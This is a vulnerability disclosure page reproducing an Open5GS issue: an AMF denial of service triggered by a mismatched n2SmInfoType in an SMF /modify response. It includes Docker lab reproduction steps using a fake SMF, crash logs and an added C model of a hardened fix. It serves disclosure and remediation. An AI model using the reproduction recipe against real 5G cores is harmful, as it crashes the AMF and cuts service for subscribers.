| Title | Open5gs AMF v2.7.7 Denial of Service |
|---|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF aborts when an SMF returns a successful:
```text
POST /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify
```
response that includes `SmContextUpdatedData.n2SmInfoType =
PDU_RES_SETUP_REQ`, but the outstanding AMF transaction state is not one of the
three states that branch accepts.
In `amf_nsmf_pdusession_handle_update_sm_context()`, the `PDU_RES_SETUP_REQ`
branch only accepts:
- `AMF_UPDATE_SM_CONTEXT_REGISTRATION_REQUEST`
- `AMF_UPDATE_SM_CONTEXT_SERVICE_REQUEST`
- `AMF_UPDATE_SM_CONTEXT_HANDOVER_REQUIRED`
Any other in-flight state hits:
```c
ogs_error("Invalid STATE[%d]", state);
ogs_assert_if_reached();
```
at `../src/amf/nsmf-handler.c:364-365`.
This is a separate client-response bug from the already documented
`/modify` success response missing `n2SmInfo`, which crashes at
`../src/amf/nsmf-handler.c:646`.
### Root Cause
- Entry chain:
  active AMF `/modify` transaction
  -> SMF success response with `n2SmInfo` present
  -> `amf_nsmf_pdusession_handle_update_sm_context()`
  -> `PDU_RES_SETUP_REQ` switch arm
  -> invalid AMF state
- Crash site:
  `../src/amf/nsmf-handler.c:365`
- Root cause family:
  assertion on impossible success-state combination from untrusted peer response
- Controlling field:
  `SmContextUpdatedData.n2SmInfoType`
### Steps to Reproduce
1. Start the Open5GS Docker lab with the normal `smf` and ensure the AMF and
SMF containers are running. In my live setup on 2026-04-12 the relevant
endpoints were:
```text
AMF SBI: http://10.33.33.5:80
SMF SBI: http://10.33.33.6:80
```
2. Start a real gNB and UE with the bundled UERANSIM configs and wait for
successful initial registration plus one active PDU session:
```bash
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
In my live run, the UE log showed:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
```
3. Replace the real SMF with the fake SMF responder on the same
`smf.open5gs.org` alias:
```bash
docker rm -f smf amf-fake-smf || true
docker run -d --name amf-fake-smf --network open5gs \
--network-alias smf.open5gs.org \
-v /home/ubuntu/open5gs_277/.audit_tmp:/work \
node:20-alpine sh -lc '
IP=$(hostname -i | awk "{print \$1}")
export AMF_FAKE_SMF_HOST_IP=$IP AMF_FAKE_SMF_PORT=80
export AMF_FAKE_SMF_MODE_FILE=/work/amf_fake_smf.mode
export AMF_FAKE_SMF_LOG_FILE=/work/amf_fake_smf.log
node /work/amf_fake_smf_modify.js'
```
4. Control experiment: configure the fake SMF to return a success response with
no `n2SmInfo`, then trigger a UE-driven `/modify` by releasing the active
PDU session:
```bash
docker exec amf-fake-smf sh -lc 'printf "missing-n2\n" > /work/amf_fake_smf.mode'
docker exec amf-audit-ue /ueransim/nr-cli imsi-001011234567891 -e 'ps-release 1'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' amf
docker logs --since '2026-04-12T16:08:20Z' amf
```
In my live run, the fake SMF received:
```text
POST /nsmf-pdusession/v1/sm-contexts/1/modify mode=missing-n2
```
and the AMF stayed up.
5. Malicious experiment: keep the same live path, but change only the fake SMF
mode so the `/modify` success response includes
`n2SmInfoType=PDU_RES_SETUP_REQ` and one multipart NGAP body:
```bash
docker exec amf-fake-smf sh -lc 'printf "type-mismatch\n" > /work/amf_fake_smf.mode'
docker exec amf-audit-ue /ueransim/nr-cli imsi-001011234567891 -e 'ps-release 1'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 50 amf
```
### Logs
```text
PDU session release procedure(s) triggered
exited 134 2026-04-12T16:08:40.833239796Z
04/12 16:07:36.433: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../lib/sbi/context.c:2111)
04/12 16:07:40.127: [amf] INFO: gNB-N2 accepted[10.33.33.8]:60860 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 16:07:40.127: [amf] INFO: gNB-N2 accepted[10.33.33.8] in master_sm module (../src/amf/amf-sm.c:953)
04/12 16:07:40.135: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 16:07:40.136: [amf] INFO: gNB-N2[10.33.33.8] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 16:07:40.339: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 16:07:40.339: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 16:07:40.339: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[1] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 16:07:40.342: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] Unknown UE by SUCI (../src/amf/context.c:1912)
04/12 16:07:40.342: [amf] INFO: [Added] Number of AMF-UEs is now 1 (../src/amf/context.c:1688)
04/12 16:07:40.342: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 16:07:40.342: [gmm] INFO: [suci-0-001-01-0000-0-0-1234567891] SUCI (../src/amf/gmm-handler.c:183)
04/12 16:07:40.344: [sbi] INFO: [454c6e9c-3644-41f1-a93f-e1505117bc41] Setup NF Instance [type:AUSF] (../lib/sbi/path.c:307)
04/12 16:07:40.362: [amf] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../src/amf/nausf-handler.c:130)
04/12 16:07:40.362: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../src/amf/nausf-handler.c:130)
04/12 16:07:40.373: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 16:07:40.375: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 16:07:40.389: [amf] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../src/amf/nudm-handler.c:361)
04/12 16:07:40.389: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../src/amf/nudm-handler.c:361)
04/12 16:07:40.390: [sbi] INFO: [5ac5b314-3644-41f1-b7b4-21a7b4c43293] Setup NF Instance [type:PCF] (../lib/sbi/path.c:307)
04/12 16:07:40.395: [amf] INFO: Setup NF EndPoint(fqdn) [pcf.open5gs.org:0] (../src/amf/npcf-handler.c:143)
04/12 16:07:40.395: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.10:80] (../src/amf/npcf-handler.c:143)
04/12 16:07:40.604: [gmm] INFO: [imsi-001011234567891] Registration complete (../src/amf/gmm-sm.c:3146)
04/12 16:07:40.604: [amf] INFO: [imsi-001011234567891] Configuration update command (../src/amf/nas-path.c:609)
04/12 16:07:40.604: [gmm] INFO: UTC [2026-04-12T16:07:40] Timezone[0]/DST[0] (../src/amf/gmm-build.c:551)
04/12 16:07:40.604: [gmm] INFO: LOCAL [2026-04-12T16:07:40] Timezone[0]/DST[0] (../src/amf/gmm-build.c:556)
04/12 16:07:40.604: [amf] INFO: [Added] Number of AMF-Sessions is now 1 (../src/amf/context.c:2798)
04/12 16:07:40.604: [gmm] INFO: UE SUPI[imsi-001011234567891] DNN[internet] LBO[0] S_NSSAI[SST:1 SD:0x1] smContextRef[NULL] smContextResourceURI[NULL] (../src/amf/gmm-handler.c:1419)
04/12 16:07:40.604: [gmm] INFO: V-SMF Instance [b8cf9818-3689-41f1-ba9b-5fb68f0c0330](LIST) (../src/amf/gmm-handler.c:1496)
04/12 16:07:40.604: [gmm] INFO: [b8cf9818-3689-41f1-ba9b-5fb68f0c0330] Setup NF Instance [type:SMF] (../src/amf/gmm-handler.c:1498)
04/12 16:07:40.604: [gmm] INFO: V-SMF Instance [b8cf9818-3689-41f1-ba9b-5fb68f0c0330] (../src/amf/gmm-handler.c:1508)
04/12 16:07:40.604: [gmm] INFO: V-SMF discovered in Non-Roaming or LBO-Roaming[0] (../src/amf/gmm-handler.c:1577)
04/12 16:07:40.604: [gmm] INFO: nsmf_pdusession [1:0x5601bf050090:(nil)] (../src/amf/gmm-handler.c:1617)
04/12 16:07:40.614: [amf] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../src/amf/nsmf-handler.c:140)
04/12 16:07:40.614: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../src/amf/nsmf-handler.c:140)
04/12 16:07:40.626: [amf] INFO: [imsi-001011234567891:1:11][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 16:08:17.442: [sbi] INFO: [b8cf9818-3689-41f1-ba9b-5fb68f0c0330] (NRF-notify) NF_DEREGISTERED event [type:SMF] (../lib/sbi/nnrf-handler.c:1186)
04/12 16:08:25.876: [amf] INFO: [imsi-001011234567891:1:16][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 16:08:40.714: [amf] ERROR: Invalid STATE[16] (../src/amf/nsmf-handler.c:364)
04/12 16:08:40.714: [amf] FATAL: amf_nsmf_pdusession_handle_update_sm_context: should not be reached. (../src/amf/nsmf-handler.c:365)
04/12 16:08:40.718: [core] FATAL: backtrace() returned 8 addresses (../lib/core/ogs-abort.c:37)
open5gs-amfd(+0x5cb82) [0x5601bd282b82]
open5gs-amfd(+0x4cf17) [0x5601bd272f17]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7f246c65aabc]
open5gs-amfd(+0xba4d) [0x5601bd231a4d]
/usr/local/lib/libogscore.so.2(+0x12b4f) [0x7f246c64ab4f]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f246b802ac3]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f246b893a84]
/usr/local/bin/entrypoint.sh: line 10: 7 Aborted (core dumped) open5gs-amfd "${@}"
```
### Expected behaviour
AMF should reject mismatched `n2SmInfoType` / transaction-state combinations
with a recoverable error path instead of aborting.
### Observed Behaviour
A single malformed SMF success response aborts the AMF process.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7 |
| Source | ⚠️ https://github.com/open5gs/open5gs/issues/4408 |
| User | ZiyuLin (UID 93568) |
| Submitted | 14/04/2026 11:43 AM (2 months ago) |
| Moderated | 01/05/2026 11:28 AM (17 days later) |
| Status | Approved |
| VulDB Entry | 360540 [Open5GS up to 2.7.7 AMF /src/amf/nsmf-handler.c amf_nsmf_pdusession_handle_update_sm_context denial of service] |
| Points | 20 |
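The "Expected behaviour" section above asks for a recoverable error path instead of an assertion when the SMF's `n2SmInfoType` does not fit the AMF's in-flight transaction state. The C model below is an added example, not code from the issue or from Open5GS: it reproduces the shape of the `PDU_RES_SETUP_REQ` branch with a table-driven state allow-list that logs and returns an error code rather than aborting. The three accepted state names are the ones the issue lists; all numeric enum values, the `AMF_UPDATE_SM_CONTEXT_OTHER_UE_DRIVEN` stand-in for "any other state" (modelled on the `STATE[16]` in the log), the `HANDLE_*` result codes and every function name here are assumptions for illustration.

```c
/*
 * Added example, not Open5GS code: a self-contained model of the
 * PDU_RES_SETUP_REQ branch of amf_nsmf_pdusession_handle_update_sm_context()
 * that rejects an SMF response whose n2SmInfoType cannot apply in the AMF's
 * current transaction state instead of asserting. Numeric values, the
 * OTHER_UE_DRIVEN state and all names below are assumptions.
 */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* AMF /modify transaction states (placeholder values; assumption). */
typedef enum {
    AMF_UPDATE_SM_CONTEXT_REGISTRATION_REQUEST = 1,
    AMF_UPDATE_SM_CONTEXT_SERVICE_REQUEST      = 2,
    AMF_UPDATE_SM_CONTEXT_HANDOVER_REQUIRED    = 3,
    /* Stands in for any other in-flight state, e.g. a UE-driven release
     * like the STATE[16] in the issue's log (name and value assumed). */
    AMF_UPDATE_SM_CONTEXT_OTHER_UE_DRIVEN      = 16,
} amf_update_state_t;

/* Subset of the 3GPP TS 29.502 N2SmInfoType values needed here. */
typedef enum {
    N2_SM_INFO_TYPE_NONE = 0,       /* response carried no n2SmInfo at all */
    N2_SM_INFO_TYPE_UNKNOWN,        /* string not in our table */
    N2_SM_INFO_TYPE_PDU_RES_SETUP_REQ,
    N2_SM_INFO_TYPE_PDU_RES_REL_CMD,
} n2_sm_info_type_t;

typedef enum {
    HANDLE_OK_SEND_N2 = 0,          /* build the NGAP message for the gNB */
    HANDLE_OK_NO_N2 = 1,            /* nothing to forward; finish transaction */
    HANDLE_ERR_STATE_MISMATCH = -1, /* peer sent a type that cannot apply now */
    HANDLE_ERR_UNKNOWN_TYPE = -2,   /* peer sent a type we do not handle */
} handle_result_t;

/* Map the JSON string SmContextUpdatedData.n2SmInfoType to an enum.
 * NULL means the field (and n2SmInfo) was absent from the response. */
n2_sm_info_type_t n2_sm_info_type_parse(const char *s)
{
    static const struct { const char *name; n2_sm_info_type_t v; } tbl[] = {
        { "PDU_RES_SETUP_REQ", N2_SM_INFO_TYPE_PDU_RES_SETUP_REQ },
        { "PDU_RES_REL_CMD",   N2_SM_INFO_TYPE_PDU_RES_REL_CMD },
    };
    if (s == NULL)
        return N2_SM_INFO_TYPE_NONE;
    for (size_t i = 0; i < sizeof tbl / sizeof tbl[0]; i++)
        if (strcmp(s, tbl[i].name) == 0)
            return tbl[i].v;
    return N2_SM_INFO_TYPE_UNKNOWN;
}

/* Allow-list: the only states in which a PDU_RES_SETUP_REQ from the SMF
 * makes sense, mirroring the three cases the issue names. */
bool pdu_res_setup_req_state_ok(amf_update_state_t state)
{
    switch (state) {
    case AMF_UPDATE_SM_CONTEXT_REGISTRATION_REQUEST:
    case AMF_UPDATE_SM_CONTEXT_SERVICE_REQUEST:
    case AMF_UPDATE_SM_CONTEXT_HANDOVER_REQUIRED:
        return true;
    default:
        return false;
    }
}

/* Hardened dispatch: every branch that depends on peer-supplied data logs
 * and returns an error; nothing in this function can abort the process. */
handle_result_t handle_update_sm_context_hardened(const char *n2_sm_info_type,
                                                  amf_update_state_t state)
{
    switch (n2_sm_info_type_parse(n2_sm_info_type)) {
    case N2_SM_INFO_TYPE_NONE:
        return HANDLE_OK_NO_N2;
    case N2_SM_INFO_TYPE_PDU_RES_SETUP_REQ:
        if (!pdu_res_setup_req_state_ok(state)) {
            /* The original code reaches ogs_assert_if_reached() here. */
            fprintf(stderr, "error: PDU_RES_SETUP_REQ in invalid STATE[%d], "
                            "rejecting SMF response\n", (int)state);
            return HANDLE_ERR_STATE_MISMATCH;
        }
        return HANDLE_OK_SEND_N2;
    case N2_SM_INFO_TYPE_PDU_RES_REL_CMD:
        /* A release command gets its own allow-list in the same style. */
        return HANDLE_OK_SEND_N2;
    default:
        fprintf(stderr, "error: unhandled n2SmInfoType '%s' in STATE[%d]\n",
                n2_sm_info_type, (int)state);
        return HANDLE_ERR_UNKNOWN_TYPE;
    }
}

/* Replays the issue's two experiments: the control (no n2SmInfo) and the
 * malicious response (PDU_RES_SETUP_REQ during a UE-driven release). */
int main(void)
{
    handle_result_t r;
    r = handle_update_sm_context_hardened(NULL, AMF_UPDATE_SM_CONTEXT_OTHER_UE_DRIVEN);
    printf("control (missing n2): result %d\n", (int)r);
    r = handle_update_sm_context_hardened("PDU_RES_SETUP_REQ",
                                          AMF_UPDATE_SM_CONTEXT_OTHER_UE_DRIVEN);
    printf("type-mismatch: result %d, process still running\n", (int)r);
    return 0;
}
```

The point of the model is the error return at the mismatch: the caller can fail the SBI transaction (release the session, or answer the gNB/UE with a failure) while the AMF keeps serving every other UE. The state-to-type allow-list belongs in one table consulted by every `n2SmInfoType` arm, and any `ogs_assert`-style check whose input comes from a peer's HTTP response is the pattern to remove.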